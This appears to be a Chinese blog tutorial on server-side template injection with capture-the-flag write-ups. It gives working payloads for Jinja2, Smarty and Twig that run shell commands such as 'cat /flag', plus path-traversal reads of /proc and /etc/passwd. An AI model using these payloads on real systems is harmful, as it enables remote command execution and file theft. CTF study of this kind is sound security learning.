当前位置: 首页 > article >正文

SSTI模板注入+CTF实例

参考文章: 

一文了解SSTI和所有常见payload 以flask模板为例-腾讯云开发者社区-腾讯云 (tencent.com)

python-flask模块注入(SSTI) - ctrl_TT豆 - 博客园 (cnblogs.com)

ssti详解与例题以及绕过payload大全_ssti绕过空格-CSDN博客

1. SSTI(模板注入)漏洞(入门篇) - bmjoker - 博客园 (cnblogs.com)

SSTI服务端模板注入漏洞原理详解及利用姿势集锦 - 2ha0yuk7on - 博客园 (cnblogs.com)


基础概念理解(以flask模板为例)

  • 模板引擎用于使用动态数据呈现内容。模板包括Ruby,Java,Twig,Smarty,AngularJS,Tornado,Flask/jinja2,Django,thymeleaf等。
  • 就像SQL注入一样,攻击者通过在注入点构造恶意的sql语句去读取数据库数据。攻击者在进行SSTI攻击时,构造恶意的模板代码去干预模板渲染的过程,也会造成敏感信息泄露等问题

payload基础

sql注入中会有information.schema这样的重要库去爆出敏感信息,模板注入借助的是各个类之间的继承关系和一些重要的魔术方法,而object类是所有类的父类。

# 基本payload
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()

## [].__class__:根据前面的变量形式可以得到其所属的类<class 'list'>
__class__:返回一个实例所属的类

## __bases__[0]:获取object父类
__base__:返回该对象所继承的基类
__mro__:和__bases__一样,返回所有的父类

## __subclasses__()[40]:获取所有子类,在所有子类中获取可以利用的类
__subclasses__:以列表返回类的子类

## [40]('/etc/passwd').read():在类中获取可以利用的方法,执行命令
这里利用的是file类的read方法

绕过姿势

SSTI漏洞利用及绕过总结(绕过姿势多样)_java ssti漏洞-CSDN博客

CTF实例

BUUCTF-NewStarCTF2023-week3-GenShin(jinja2)

1.一开始用dirsearch去扫描目录,发现有/robots.txt和/console文件,以为有用,但是这道题考察的是ssiti注入。

2.看wp才知道,在根目录下有敏感目录/secr3tofpop,访问后需要输入name参数,这里有注入点。先用{{7*7}}尝试,发现被过滤。

 3.最终payload:

?name={%print([].__class__.__base__.__subclasses__()[132].__enter__.__globals__["pop"+"en"]("cat%20/flag").read())%}

 __subclasses__()[132]是os._wrap_close类,在第132个。这个类有popen方法,需要先使用__enter__方法再调用__globals__可以获取方法内以字典的形式返回的方法、属性等值。

BUUCTF-N1BOOK-第一章web入门 afr_3(flask session伪造)

1.页面一直进入到article,尝试输入?name=flag,显示no permission,应该是要更改cookie的session值。当输入index.php时,显示了index.php的路径:/home/nu11111111l/articles/index.php

2. 尝试使用../等来进行任意文件读取。

payload1:
?name=../../../proc/self/cmdline

 Linux系统上的/proc目录是一种文件系统,即proc文件系统,存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前运行进程的信息,甚至可以通过更改其中这些文件来改变内核运行状态。

/proc/self 表示当前进程目录

/proc/self/cmdline 获取启动当前进程的完整命令。

 3.得到运行命令:python server.py,再通过以下命令查看源码

payload2:
?name=../../../../proc/self/cwd/server.py

cwd文件是一个指向当前进程运行目录的符号链接。可以通过查看cwd文件获取目标指定进程环境的运行目录。

4.分析源码,发现运行了两个文件:flag.py, key.py。访问flag.py还是显示no permission,访问key.py,得到密钥。

5.在n1page方法里用到了render_template_string()方法,并且也用到了格式化字符串,可以判断这里存在模板注入。 

在/n1page页面对post输入n1code进行了过滤,没有办法通过传入n1code的值来实现注入,但是可以直接更改session的值来操控输出,这里session被app.secret_key进行了加密。

ssti payload:
{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}

 6.在这里要用kali下载flask-session-cookie-manager,执行命令:

BUUCTF-[CISCN2019 华东南赛区]Web11(smarty)

1.打开靶场,发现页面下方先是Build With Smarty !,说明模板引擎为smarty。

2.尝试修改XFF,用{$smarty.version}确认是否有漏洞,可以看到smarty的版本号。

3.因为smarty3已经弃用了{php}{/php}标签,所以这里用不了。

如果可以利用{php}{/php}标签,可以使用{php}{/php}标签来执行被包裹其中的php指令。

例如:{php}phpinfo();{/php}

 4.对于php5的环境可以用以下payload,但是这道题是php7,所以这种方法也不行

x-forwarded-for: <script language="php">system('cat /flag')</script>

5.还可以用静态方法,但是在这里也不行。

6. 最终用的是if标签,在标签里面放置php命令

payload1:
x-forwarded-for: {if system('cat /flag')}{/if}
或者直接用{system('cat /flag')}也可以得到flag

BUUCTF-[BJDCTF2020]Cookie is so stable(Twig)

1.根据题目,用bp抓包,可以发现在/flag.php随便输入123时,可以抓到两个请求包,第2个请求包会在cookie里添加user参数,应该存在注入点。判断模板引擎,先输入{{7*7}},回显49,再输入{{7*'7'}},还是回显49,为Twig模板。

2.用以下payload判断Twig模板的版本。

        Twig1.x的模板注入就是利用_self.env中的方法进行注入,_self会返回当前模板的实例,env会指向Twig_Environment,所以就是利用Twig_Environment中的其他方法。

        因为在Twig 2.x及Twig 3.x,_self的作用发生了变化,只能返回当前实例名字符串,所以以下payload只能适用于Twig 1.x。

payload1:
Cookie:user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

3. 最后用以下payload得到flag。

payload:
Cookie: user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}


http://www.kler.cn/a/354641.html

相关文章:

  • 《繁星路》V1.8.3(Build16632266)官方中文学习版
  • Django学习笔记之数据库(一)
  • /src/utils/request.ts:axios 请求封装,适用于需要统一处理请求和响应的场景
  • 代码随想录 链表 test 5
  • Flutter Web 中文字体显示异常问题
  • Blazor用户身份验证状态详解
  • TS学习——type与interface的异同点
  • c++基础知识复习(1)
  • pdf删除几个页面怎么操作?PDF页面删除的快捷方法
  • Unity UGUI SuperScrollView介绍
  • ETL技术在金蝶云星空与旺店通WMS集成中的应用
  • 期货交易程序化,哪些API可供选择及如何使用?
  • taro小程序如何全局监听路由变化?
  • 基于SpringBoot+Vue+uniapp微信小程序的乡村政务服务系统的详细设计和实现(源码+lw+部署文档+讲解等)
  • AI学习指南深度学习篇-生成对抗网络的变体及扩展
  • 02 go语言(golang) - 包和模块
  • 什么是 SQL 命令?SQL 如何工作?
  • Maven基于构建阶段分析多余的依赖
  • Linux 下find常用命令整理(更新ing)
  • HCIP-HarmonyOS Application Developer 习题(十二)
  • 阿加犀构建开发者生态的全链路赋能之旅
  • QGIS--DEMTO3D
  • Pytorch分布式训练杂记1
  • DS链式二叉树的基本操作和OJ题(12)
  • mysql数据同步ES方案---DTS
  • 鸿蒙开发 四十四 ArkTs BuilderParam传递UI(二)